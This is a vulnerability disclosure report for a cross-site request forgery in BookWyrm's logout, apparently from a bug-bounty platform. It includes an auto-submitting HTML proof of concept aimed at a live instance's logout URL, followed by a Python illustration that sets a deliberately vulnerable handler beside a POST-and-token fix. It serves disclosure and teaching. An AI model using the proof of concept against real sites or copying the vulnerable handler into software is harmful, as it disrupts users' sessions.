Cross-Site Request Forgery (CSRF) in bookwyrm-social/bookwyrm

Valid

Reported on

Jul 6th 2022


Description

An attacker is able to log out a user if a logged-in user visits the attacker's website.

Proof of Concept

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://book.dansmonorage.blue/logout">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact

This vulnerability lets an attacker force a logged-in user into an unintentional logout.

More details

One way a GET request could be abused here is that a person (a competitor, perhaps) places an image tag with src="<your logout link>" anywhere on the internet; if a user of your site stumbles upon that page, they will be unknowingly logged out. This is why logout should be a POST request protected by a CSRF token.
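The following is an added illustration of the fix described above, not code from the report or from the BookWyrm project. It places a logout handler that accepts any request method beside a hardened one that requires POST plus a per-session CSRF token, using a constructed stand-in for the request and session objects rather than a real web framework. The field name csrfmiddlewaretoken follows Django's convention; the 405 status for non-POST requests mirrors what Django's require_POST decorator returns.

```python
import hmac
import secrets
from dataclasses import dataclass, field


# Constructed stand-in for a framework request: method, form body and session.
@dataclass
class Request:
    method: str
    session: dict
    POST: dict = field(default_factory=dict)


def logout_vulnerable(request):
    """Weak setting: every request method ends the session, so a hidden
    <form> or an <img src="/logout"> on a third-party page logs the user out."""
    request.session.clear()
    return 302  # redirect to the login page


def issue_csrf_token(session):
    """Bind a fresh random token to the session; the server embeds it in its
    own logout form, where a cross-origin page cannot read it."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def logout_hardened(request):
    """Hardened setting: only a POST whose token matches the session's token
    may end the session. Compared in constant time."""
    if request.method != "POST":
        return 405  # method not allowed, session untouched
    expected = request.session.get("csrf_token")
    supplied = request.POST.get("csrfmiddlewaretoken", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return 403  # forbidden, session untouched
    request.session.clear()
    return 302


# Each scenario returns (status, still_logged_in) for a given handler.
def scenario_cross_site_get(handler):
    """A third-party page loads <img src='/logout'>: a GET with no token."""
    session = {"user_id": 42}
    issue_csrf_token(session)
    status = handler(Request("GET", session))
    return status, "user_id" in session


def scenario_cross_site_post(handler):
    """A third-party auto-submitting form: a POST, but the attacker cannot
    know the victim's token, so the field is absent."""
    session = {"user_id": 42}
    issue_csrf_token(session)
    status = handler(Request("POST", session))
    return status, "user_id" in session


def scenario_legitimate_post(handler):
    """The site's own logout form: a POST carrying the session-bound token."""
    session = {"user_id": 42}
    token = issue_csrf_token(session)
    status = handler(Request("POST", session, {"csrfmiddlewaretoken": token}))
    return status, "user_id" in session


if __name__ == "__main__":
    print("vulnerable, cross-site GET :", scenario_cross_site_get(logout_vulnerable))
    print("hardened,   cross-site GET :", scenario_cross_site_get(logout_hardened))
    print("hardened,   cross-site POST:", scenario_cross_site_post(logout_hardened))
    print("hardened,   legitimate POST:", scenario_legitimate_post(logout_hardened))
```

In a Django application the same two checks are provided by the require_POST decorator and the CsrfViewMiddleware, so the handler itself stays a plain view; the point the scenarios make is that restricting the method alone is not enough, since an attacker's page can auto-submit a POST form (as the proof of concept above does), and it is the unguessable session-bound token that stops it.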

Note

While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF.

Mouse Reeve validated this vulnerability 24 days ago
KhanhCM has been awarded the disclosure bounty
Mouse Reeve confirmed that a fix has been merged on cf5959 24 days ago
login.py#L77-L83 has been validated